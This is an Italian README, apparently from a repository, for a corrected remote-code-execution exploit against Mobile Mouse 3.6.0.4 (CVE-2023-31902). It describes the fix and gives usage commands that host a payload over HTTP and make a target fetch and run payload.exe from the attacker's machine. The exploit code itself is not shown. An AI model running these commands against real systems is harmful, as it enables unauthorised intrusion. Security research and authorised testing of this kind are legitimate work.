
Mobile Mouse 3.6.0.4 - Esecuzione di codice in remoto - CVE-2023-31902
Una versione corretta dell'exploit di esecuzione remota di codice per Mobile Mouse 3.6.0.4 pubblicato come EDB-51010.
L'exploit originale scarica correttamente il payload ma potrebbe non riuscire a eseguirlo perché entrambe le fasi utilizzano la stessa connessione TCP.
Questa versione:
Utilizza inoltre sendall(), percorsi Windows correttamente escapati, timeout di socket e una gestione base degli errori.
Avvia un server HTTP nella directory del payload:
python3 -m http.server 8080
Esegui l'exploit:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
Questo progetto è destinato esclusivamente a test di sicurezza autorizzati e a ricerca educativa. Non utilizzarlo contro sistemi senza autorizzazione esplicita.